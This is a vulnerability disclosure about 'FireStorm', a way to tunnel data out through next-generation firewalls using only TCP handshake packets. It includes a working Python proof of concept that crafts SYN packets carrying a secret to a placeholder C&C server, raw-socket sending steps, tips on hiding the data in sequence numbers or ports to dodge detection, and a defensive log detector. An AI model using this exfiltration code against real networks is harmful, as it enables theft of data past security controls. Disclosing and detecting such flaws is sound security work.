BugSec Group and Cynet discovered a severe vulnerability in Next Generation Firewalls (NGFWs). Head of Offensive Security Stas Volfus uncovered the vulnerability, dubbed FireStorm, which allows an internal entity or malicious code to communicate with hosts outside the organization and extract data to them, bypassing the firewall's egress restrictions entirely.

We found that these firewalls are designed to let the full TCP three-way handshake complete regardless of the packet's destination, because they need the first data packets of a session to identify which application protocol is in use (web-browsing, telnet, etc.) before application-based policy can be applied. This behaviour occurs whenever the device is configured, for example, to allow web browsing (HTTP/S) from the LAN to specific locations on the Internet (URL filtering), and it holds even when only a single location is allowed.
This allowed us to complete a full TCP handshake on the HTTP port with a C&C (Command and Control) server hosted by BugSec, a destination that the policy did not permit.

From there, we were able to encode messages into the handshake packets themselves and tunnel them out through the handshake, reaching any destination on the Internet regardless of firewall rules and client restrictions.

It is important to mention that any traffic sent to the C&C server after the TCP handshake was blocked immediately: the policy engine categorized the session as "unknown-tcp", and that destination was not allowed for HTTP. The handshake packets themselves, however, had already crossed the firewall.

Malware and attackers can exploit this flaw to communicate with unauthorized servers on the Internet simply by taking advantage of the ability to perform a TCP handshake with any destination. In effect, the firewall's block from the LAN to the outside world is removed.

Together with Chief Technology Officer Idan Cohen, the team created a tool (which will not be disclosed) that extracts sensitive data from the LAN using only the TCP handshake. The tool provides full tunneling over the TCP handshake.
A simple demonstration of the vulnerability uses a Python script located in the LAN and a sniffer located on the C&C server. The client script sends TCP SYN packets carrying the string "This is a secret..." to the C&C server, and the server captures them. During our tests we extracted the data successfully, proving the vulnerability.

CLIENT SCRIPT (PYTHON)

[Image: the client-side Python script, not reproduced in the text]

After running the client-side Python script, this is the result on the server (tcpdump, filtered on SYN packets):

[Image: tcpdump output on the C&C server showing the captured SYN packets]
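The client/sniffer pair described above, written out as an added example; this is not the authors' script or their undisclosed tool. It hand-crafts IPv4/TCP packets with only the SYN flag set, splits the secret across their data fields, and on the sniffer side keeps only data-bearing SYNs (the equivalent of a tcpdump SYN filter) and reassembles them. The endpoints, ports and chunk size are constructed (RFC 5737 documentation addresses), and the code works on in-memory packets so it runs offline; sending them on the wire would need a raw socket and a real C&C address, which are assumptions outside the example.

```python
import struct

# Constructed example endpoints (RFC 5737 documentation ranges, not real hosts).
LAN_HOST = "192.0.2.10"      # internal client behind the NGFW
C2_HOST = "203.0.113.5"      # sniffer / C&C on the Internet
DST_PORT = 80                # the port the URL-filtering rule lets the handshake reach
BASE_SPORT = 40000
SYN_FLAG = 0x02
CHUNK = 16                   # bytes of secret carried per SYN (assumption)


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; a buffer whose checksum field is correct sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_bytes(addr: str) -> bytes:
    return bytes(int(octet) for octet in addr.split("."))


def build_syn(src: str, dst: str, sport: int, dport: int, seq: int, payload: bytes = b"") -> bytes:
    """IPv4 + TCP segment with only SYN set; payload (normally empty in a SYN) follows the header."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, SYN_FLAG, 65535, 0, 0)
    pseudo = ip_bytes(src) + ip_bytes(dst) + struct.pack("!BBH", 0, 6, len(tcp) + len(payload))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0x4000,
                     64, 6, 0, ip_bytes(src), ip_bytes(dst))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload


def exfil_packets(secret: bytes) -> list:
    """Client side: one SYN per chunk; the ISN carries the chunk index so the sniffer can reorder."""
    chunks = [secret[i:i + CHUNK] for i in range(0, len(secret), CHUNK)]
    return [build_syn(LAN_HOST, C2_HOST, BASE_SPORT + i, DST_PORT, i, chunk)
            for i, chunk in enumerate(chunks)]


def parse_packet(pkt: bytes):
    """Decode an IPv4/TCP packet into (src, dst, sport, dport, flags, seq, payload); None if not TCP or corrupt."""
    if len(pkt) < 40 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if checksum(pkt[:ihl]) != 0:
        return None                     # IP header checksum mismatch
    segment = pkt[ihl:total_len]
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, 6, len(segment))
    if checksum(pseudo + segment) != 0:
        return None                     # TCP checksum mismatch
    sport, dport, seq, _ack, offset, flags = struct.unpack("!HHIIBB", segment[:14])
    data_start = (offset >> 4) * 4
    src = ".".join(str(b) for b in pkt[12:16])
    dst = ".".join(str(b) for b in pkt[16:20])
    return src, dst, sport, dport, flags, seq, segment[data_start:]


def syn_with_data(pkt: bytes) -> bool:
    """Detection check: a SYN should carry no data unless TCP Fast Open (RFC 7413) is in use."""
    parsed = parse_packet(pkt)
    return parsed is not None and parsed[4] == SYN_FLAG and len(parsed[6]) > 0


def recover_secret(packets) -> bytes:
    """Sniffer side, the equivalent of tcpdump 'tcp[tcpflags] == tcp-syn': collect data-bearing SYNs."""
    chunks = {}
    for pkt in packets:
        parsed = parse_packet(pkt)
        if parsed is None:
            continue
        _src, _dst, _sport, dport, flags, seq, payload = parsed
        if flags == SYN_FLAG and dport == DST_PORT and payload:
            chunks[seq] = payload       # ISN doubles as the chunk index
    return b"".join(chunks[k] for k in sorted(chunks))


if __name__ == "__main__":
    secret = b"This is a secret..."
    pkts = exfil_packets(secret)
    print(len(pkts), "SYN packet(s), recovered:", recover_secret(pkts))
```

Putting the packets on the wire is a raw-socket send per packet (`socket.SOCK_RAW` with `IPPROTO_RAW`, root required) and nothing else; no SYN-ACK is needed for the data to arrive, which is exactly why the firewall's handshake allowance is enough. The string in the SYN data is only the simplest encoding: the same bits fit in the ISN or the source port of an otherwise normal SYN, so a detector that only flags data-bearing SYNs (legitimate only with TCP Fast Open) will miss those variants.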

We disclosed the full details of the vulnerability to the major vendors affected by the flaw. One of the vendors who replied explained that they do not consider this a vulnerability because, by design, their firewall permits the full TCP handshake in order to inspect the application type.

They said that once their state machine proceeded beyond the TCP handshake, they would recognize the application, matching a subsequent rule that applied to application traffic. The vendor added that if there was an application they did not recognize, they would treat the session as ‘unknown-TCP’ and, again, perform an additional security policy lookup to decide whether to allow or block the traffic.

We believe that this is a dangerous vulnerability, and that monitoring should be added to the firewall to provide blocking on repeated suspicious handshake attempts and to block direct connections between an internal host and an unauthenticated foreign host.
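A sketch of the monitoring the paragraph above asks for, added here as an example and not any vendor's feature: it walks firewall session records and alerts on an internal host that repeatedly completes handshakes to destinations outside the allow list with no application data ever passed, which is the footprint the handshake-only tunnel leaves behind. The log format, addresses, allow list and thresholds are all constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime

# Constructed allow list: the single Internet location the URL-filtering rule permits.
ALLOWED_DESTINATIONS = {"198.51.100.20"}
THRESHOLD = 5        # handshake-only sessions per source before we alert (assumption)
WINDOW_SECONDS = 60  # sliding window length (assumption)

# Constructed session records, not a real vendor log format:
# timestamp src dst dport app_id bytes_after_handshake action
SAMPLE_LOG = """\
2015-12-01T10:00:00 192.0.2.10 198.51.100.20 443 ssl 5120 allow
2015-12-01T10:00:01 192.0.2.10 203.0.113.5 80 unknown-tcp 0 deny
2015-12-01T10:00:02 192.0.2.10 203.0.113.5 80 unknown-tcp 0 deny
2015-12-01T10:00:03 192.0.2.10 203.0.113.5 80 unknown-tcp 0 deny
2015-12-01T10:00:04 192.0.2.10 203.0.113.5 80 unknown-tcp 0 deny
2015-12-01T10:00:05 192.0.2.10 203.0.113.5 80 unknown-tcp 0 deny
2015-12-01T10:00:06 192.0.2.10 203.0.113.5 80 unknown-tcp 0 deny
2015-12-01T10:05:00 192.0.2.11 203.0.113.9 80 unknown-tcp 0 deny
2015-12-01T10:30:00 192.0.2.11 198.51.100.20 80 web-browsing 2048 allow
"""


def parse_record(line: str) -> dict:
    ts, src, dst, dport, app, nbytes, action = line.split()
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst, "dport": int(dport),
            "app": app, "bytes": int(nbytes), "action": action}


def is_handshake_only(rec: dict) -> bool:
    """The tunnel's footprint: handshake completed, application type never identified,
    no data passed after it, and a destination the policy does not allow."""
    return (rec["app"] == "unknown-tcp" and rec["bytes"] == 0
            and rec["dst"] not in ALLOWED_DESTINATIONS)


def find_syn_tunnel_suspects(log_text: str, threshold: int = THRESHOLD,
                             window: int = WINDOW_SECONDS) -> list:
    """Sliding-window count of handshake-only sessions per internal host; one alert per host."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if not is_handshake_only(rec):
            continue
        window_q = recent[rec["src"]]
        window_q.append(rec)
        while (rec["ts"] - window_q[0]["ts"]).total_seconds() > window:
            window_q.popleft()          # drop sessions older than the window
        if len(window_q) >= threshold and rec["src"] not in alerted:
            alerted.add(rec["src"])
            alerts.append({
                "src": rec["src"],
                "count": len(window_q),
                "destinations": sorted({r["dst"] for r in window_q}),
                "first": window_q[0]["ts"].isoformat(),
                "last": rec["ts"].isoformat(),
                "recommended_action": "block outbound SYNs from src to non-allowed destinations",
            })
    return alerts


if __name__ == "__main__":
    for alert in find_syn_tunnel_suspects(SAMPLE_LOG):
        print(alert)
```

The single allowed session in the sample (ssl to the allow-listed host) is ignored, and the one stray handshake from 192.0.2.11 stays below threshold; only the host hammering the same unallowed destination is flagged. A single completed handshake to an unexpected host is normal noise, which is why the recommendation in the text is about repeated attempts rather than a per-packet rule; the threshold and window would be tuned per environment.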